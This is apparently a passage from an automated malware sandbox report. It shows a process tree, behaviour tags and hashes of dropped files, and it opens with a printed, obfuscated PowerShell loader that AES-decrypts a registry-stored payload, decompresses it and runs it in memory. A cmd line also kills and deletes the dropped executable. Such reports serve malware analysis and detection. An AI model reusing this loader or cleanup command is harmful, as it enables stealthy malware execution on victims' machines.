-join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:344 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:5632
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 344 -s 3445⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5084
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3772
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3608
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4240
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1444
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2592
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5000
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4984
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:2296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1140
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 9bc562ae930479206c46913da1e1db41 9bBHtcBvokO5MB9EvWYgHw.0.1.0.0.01⤵PID:3988
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4700
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:4108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3496
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1708
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5816 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 344 -ip 3442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5704
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38KB
MD517cec6efb37d652a9fd2ce2f42b754d0
SHA1c42b66a53ab7cb66e132e6adfc16c331e5b72e0c
SHA2561c006b4f0b9f6b71401e974d11cd7ed30b916280d974850540baad6f0936c4b1
SHA51239722dbe861a10e7fdcc9452e34e357933d6b8920f671d8842a39c51445cb2488258c4048ec875e3b5cf3e124c44f23e688b41b3adcd50f23bc91ecbcbd127e0
-
Filesize
13KB
MD55f1dbef73612091cc14ceedbb72ec6d7
SHA19df904d232d1b86aa695d9581ad4731985601357
SHA2569ebee7937c6ef3916bbd99fc59cc9d2c1af5eec3b75195215224f7d32aac89ad
SHA512ef757df78b041e19cf38188d47cf681c3dd578398bd8f5654dea7f4bd367d6aefee978620ef4d61e353b82e4b94be64b391c46b6d3dda1bcf64c142086f4e254
-
Filesize
445KB
MD52e5a8590cf6848968fc23de3fa1e25f1
SHA1801262e122db6a2e758962896f260b55bbd0136a
SHA2569785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3
SHA5125c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD54ac1741ceb19f5a983079b2c5f344f5d
SHA1f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA2567df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd
-
Filesize
2KB
MD5a9124c4c97cba8a07a8204fac1696c8e
SHA11f27d80280e03762c7b16781608786f5a98ff434
SHA2568ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11